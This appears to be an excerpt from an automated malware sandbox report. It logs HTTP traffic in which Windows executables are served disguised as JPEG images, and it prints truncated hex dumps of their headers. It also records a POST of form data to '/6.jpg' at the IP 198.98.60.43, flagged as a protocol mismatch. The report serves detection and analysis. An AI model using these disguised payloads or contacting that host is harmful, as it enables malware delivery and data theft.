00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 
00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:15 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:20 GMT ETag: "217d0-58aa825fc8c00" Accept-Ranges: bytes Content-Length: 137168 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 
00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:15 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:30 GMT ETag: "6b738-58aa826952280" Accept-Ranges: bytes Content-Length: 440120 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 
00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:16 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:01:44 GMT ETag: "1303d0-58aa8276ac200" Accept-Ranges: bytes Content-Length: 1246160 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:20 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:02:02 GMT ETag: "14748-58aa8287d6a80" Accept-Ranges: bytes Content-Length: 83784 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 
00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Posts data to a JPG file (protocol mismatch)
    Source: unknown; HTTP traffic detected: POST /6.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 198.98.60.43 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 19:34:09 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24Last-Modified: Tue, 04 May 2021 09:17:04 GMTETag: "3d538-5c17d8a9a6400"Accept-Ranges: bytesContent-Length: 251192Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 29 12 91 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 6a 03 00 00 4a 00 00 00 00 00 00 ce 89 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 89 03 00 57 00 00 00 00 a0 03 00 2c 47 00 00 00 00 00 00 00 00 00 00 00 b6 03 00 38 1f 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 69 03 00 00 20 00 00 00 6a 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 47 00 00 00 a0 03 00 00 48 00 00 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 89 03 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 63 03 00 c4 25 00 00 03 00 
00 00 57 00 00 06 30 46 00 00 80 1d 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 09 00 2e 00 00 00 00 00 00 00 02 28 16 00 00 0a 02 03 19 2d 14 26 26 02 28 17 00 00 0a 6f 18 00 00 0a 15 2d 0b 26 26 2b 0e 7d 01 00 00 04 2b e7 7d 03 00 00 04 2b 00 2a 00 00 1b 30 03 00 29 00 00 00 01 00 00 11 02 7b 01 00 00 04 15 2d 08 26 06 1f fd 2e 09 2b 03 0a 2b f6 06 17 33 10 00 de 0d 02 15 2d 02 26 dc 28 04 00 00 06 2b f8 2a 00 00 00 01 10 00 00 02 00 19 00 02 1b 00 0d 00 00 00 00 1b 30 05 00 11 01 00 00 02 00 00 11 02 7b 01 00 00 04 16 2c 06 26 07 2c 16 2b 03 0b 2b f8 07 17 2e 73 16 18 2d 06 26 dd ef 00 00 00 0a 2b f8 02 15 1c 2d 2f 26 26 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 04 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 86 00 00 00 7d 01 00 00 04 2b cc 02 02 7b 08 00 00 04 6f 03 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 19:35:04 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24Last-Modified: Thu, 06 Jun 2019 14:01:52 GMTETag: "235d0-58aa827e4d400"Accept-Ranges: bytesContent-Length: 144848Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/jpegData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 
60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:04 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Mon, 07 Aug 2017 05:52:20 GMT ETag: "9d9d8-5562373312d00" Accept-Ranges: bytes Content-Length: 645592 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/jpeg
    Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Tue, 04 May 2021 19:35:06 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24 Last-Modified: Thu, 06 Jun 2019 14:00:58 GMT ETag: "519d0-58aa824acda80" Accept-Ranges: bytes Content-Length: 334288 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: image/jpeg
